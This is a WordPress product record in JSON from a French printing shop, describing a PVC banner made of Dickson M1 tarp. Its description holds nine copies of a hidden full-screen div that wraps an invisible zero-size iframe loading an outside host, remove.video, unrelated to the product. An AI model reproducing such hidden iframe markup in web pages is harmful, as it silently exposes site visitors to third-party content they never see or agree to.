{"id":965,"date":"2020-05-12T17:47:07","date_gmt":"2020-05-12T15:47:07","guid":{"rendered":"https:\/\/imprimerie-copylux.fr\/?post_type=product&#038;p=965"},"modified":"2021-04-18T12:33:59","modified_gmt":"2021-04-18T10:33:59","slug":"bache","status":"publish","type":"product","link":"https:\/\/imprimerie-copylux.fr\/index.php\/product\/bache\/","title":{"rendered":"BANDEROLE PVC"},"content":{"rendered":"","protected":false},"excerpt":{"rendered":"<p>La <strong>b\u00e2che 550 gr Class\u00e9 M1 de Dickson<\/strong> est id\u00e9ale pour communiquer sur une prochaine manifestation organis\u00e9e par votre association ou par votre entreprise.<\/p>\n<p>La toile est tr\u00e8s r\u00e9sistante m\u00e9caniquement, parfaitement adapt\u00e9e pour une utilisation sur des \u00e9v\u00e9nements soumis \u00e0 contr\u00f4le s\u00e9curit\u00e9 incendie.<\/p>\n<p>Sa laize maximale est de 100 cm imprimable.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-968\" src=\"https:\/\/imprimerie-copylux.fr\/wp-content\/uploads\/2020\/05\/Logo-Dickson-300x146.jpg\" alt=\"\" width=\"84\" height=\"41\" srcset=\"https:\/\/imprimerie-copylux.fr\/wp-content\/uploads\/2020\/05\/Logo-Dickson-300x146.jpg 300w, https:\/\/imprimerie-copylux.fr\/wp-content\/uploads\/2020\/05\/Logo-Dickson-600x291.jpg 600w, https:\/\/imprimerie-copylux.fr\/wp-content\/uploads\/2020\/05\/Logo-Dickson.jpg 723w\" sizes=\"auto, (max-width: 84px) 100vw, 84px\" \/><\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n","protected":false},"featured_media":1829,"template":"","meta":[],"product_brand":[],"product_cat":[55],"product_tag":[],"class_list":{"0":"post-965","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-signaletique","8":"first","9":"instock","10":"featured","11":"shipping-taxable","12":"product-type-variable"},"_links":{"self":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product\/965","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media\/1829"}],"wp:attachment":[{"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/media?parent=965"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_brand?post=965"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_cat?post=965"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/imprimerie-copylux.fr\/index.php\/wp-json\/wp\/v2\/product_tag?post=965"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}